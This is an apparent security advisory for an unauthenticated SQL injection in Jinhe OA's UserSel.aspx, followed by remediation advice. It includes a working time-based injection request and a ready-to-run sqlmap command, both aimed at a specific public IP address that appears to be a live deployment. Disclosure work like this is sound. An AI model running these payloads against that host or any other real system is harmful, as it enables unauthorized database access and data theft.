# Jinhe OA SQL Injection Vulnerability Report #1 ## Vulnerability Overview * **Vulnerability Type**: SQL Injection * **Affected Product**: Jinhe OA (Jsoft OA) * **Affected Component**: `C:\Jsoft.Web.Plansummarizer\UserSel.aspx` * **Affected Version**: V1.0 * **Root Cause**: The `DeptIDList` parameter is directly concatenated into the SQL query without validation or parameterization. * **Exploitation Conditions**: No Authentication Required. ## Impact Scope * Unauthorized access to sensitive user data and business information. * Potential privilege escalation via database access. * Possible remote code execution on the database server. * Complete compromise of the OA system and data. ## Proof of Concept (POC) **Proof-of-Concept Request:** ```http GET /C:/Jsoft.Web.Plansummarizer/UserSel.aspx?GetDeptIDList=DeptIDList=1;WAITFOR DELAY '0:0:5'-- HTTP Host: 221.1.82.114:8088 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application Accept-Encoding: gzip, deflate, br Cookie: ASP.NET_Session2=exqurufz2f5f5fMwujusut3 Connection: keep-alive ``` **sqlmap Detection Command:** ```bash python sqlmap.py --random-agent --batch -u "http://221.1.82.114:8088/C:/Jsoft.Web.Plansummarizer/UserSel.aspx?GetDeptIDList=DeptIDList=1" --dbms=mssql --current-db ``` ## Remediation 1. Use parameterized queries (prepared statements) for all database interactions. 2. Apply strict input validation and filtering to all user inputs. 3. Adhere to the principle of least privilege for database accounts. 4. Conduct comprehensive code audits. 5. Deploy a Web Application Firewall (WAF) as a temporary protective measure. 6. Perform regular security testing and penetration testing.